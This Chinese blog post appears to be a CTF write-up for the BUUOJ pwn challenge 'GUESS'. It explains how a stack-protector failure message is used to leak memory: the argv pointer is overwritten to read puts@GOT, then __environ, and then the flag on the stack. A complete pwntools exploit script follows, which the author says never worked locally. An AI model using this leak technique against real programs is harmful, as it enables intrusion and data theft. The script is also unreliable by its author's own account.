我的技术与生活——GUESS

开了canary

在输入位置对应的第25个参数，相差0x128的位置上是main函数的第一个参数argc,后面是第三个envp参数

把argc的位置覆盖成puts_got,泄露偏移，算出environ=base+libc.sym[‘__environ’],这个存着栈上的地址，即0x7ffdfb3b9728这个地址，这个地址存着环境变量，再覆盖argc为environ，打印出栈地址，再算偏移

本地一直打不通，调试也有问题

exp

from pwn import*
from LibcSearcher import *
#p=remote("node5.buuoj.cn",26222)
p=process("./GUESS")
context.log_level="debug"
elf=ELF('./GUESS')
puts_got=elf.got['puts']
libc=ELF('./libc-2.23.so')
payload=b'a'*0x128+p64(puts_got)
p.recvuntil(' guessing flag')

p.sendline(payload)
p.recvuntil('detected ***: ')
puts_addr=u64(p.recvuntil('\x7f').ljust(8,b'\x00'))
print(hex(puts_addr))
base=puts_addr-libc.sym['puts']
environ=base+libc.sym['__environ']
payload=b'a'*0x128+p64(environ)
gdb.attach(p)
p.recvuntil(' guessing flag')
p.sendline(payload)

p.recvuntil('detected ***: ')
envi=u64(p.recvuntil('\x7f').ljust(8,b'\x00'))
print(hex(envi))
flag=envi-0x168
payload=b'a'*0x128+p64(flag)
p.recvuntil(' guessing flag')
p.sendline(payload)
p.interactive()

站点信息

GUESS

在输入位置对应的第25个参数，相差0x128的位置上是main函数的第一个参数argc,后面是第三个envp参数

把argc的位置覆盖成puts_got,泄露偏移，算出environ=base+libc.sym[‘__environ’],这个存着栈上的地址，即0x7ffdfb3b9728这个地址，这个地址存着环境变量，再覆盖argc为environ，打印出栈地址，再算偏移

本地一直打不通，调试也有问题

exp

评论区

目录

公告栏